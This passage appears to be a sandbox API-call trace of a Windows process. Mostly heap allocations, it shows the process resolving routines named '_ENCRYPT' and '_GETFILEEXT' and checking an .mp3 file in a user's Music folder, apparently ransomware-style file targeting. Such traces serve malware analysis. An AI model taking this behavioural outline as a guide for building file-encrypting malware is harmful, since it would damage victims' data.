dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0187.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0187.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0187.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0187.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0187.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=64, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0187.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0187.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=64, lpWideCharStr=0x9c0c00, cchWideChar=64 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3") returned 64 [0187.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0187.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0187.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0187.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0187.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0187.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0187.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0187.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0187.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0187.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0187.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0187.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0187.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0187.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0187.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0187.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0187.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0187.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0187.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0187.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0187.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0187.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0187.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0187.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0187.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0187.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0187.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0187.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0187.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0187.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0187.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0187.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0187.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0187.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0187.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0187.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0187.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0187.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0187.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0187.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0187.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0187.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0187.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0187.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0187.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0187.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0187.730] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0187.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0187.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0187.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0187.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0187.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0187.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0187.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0187.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0187.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0187.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0187.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0187.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0187.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.732] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0187.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0187.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0187.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0187.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0187.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0187.733] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0187.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0187.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0187.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0187.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0187.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0187.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0187.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0187.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0187.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0187.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0187.734] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0187.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0187.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0187.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0187.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0187.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0187.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0187.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0187.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.735] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0187.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0187.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd738 [0187.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd738, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0187.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0187.735] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0187.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0187.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0187.736] CloseHandle (hObject=0x158) returned 1 [0187.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0187.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0187.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0187.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0187.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0187.736] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0187.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0187.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0187.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0187.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0187.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0187.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0187.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0187.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0187.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0187.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0187.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0187.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.737] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0187.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0187.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0187.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0187.737] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.737] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0187.737] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.737] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0187.737] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0187.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.738] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.738] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.738] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.738] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b458d70, ftCreationTime.dwHighDateTime=0x1d5e70e, ftLastAccessTime.dwLowDateTime=0xc82411d0, ftLastAccessTime.dwHighDateTime=0x1d5dceb, ftLastWriteTime.dwLowDateTime=0xc82411d0, ftLastWriteTime.dwHighDateTime=0x1d5dceb, nFileSizeHigh=0x0, nFileSizeLow=0x182d4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="RRCvJ.mp3", cAlternateFileName="")) returned 0x90add8 [0187.738] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0187.738] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.738] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b458d70, ftCreationTime.dwHighDateTime=0x1d5e70e, 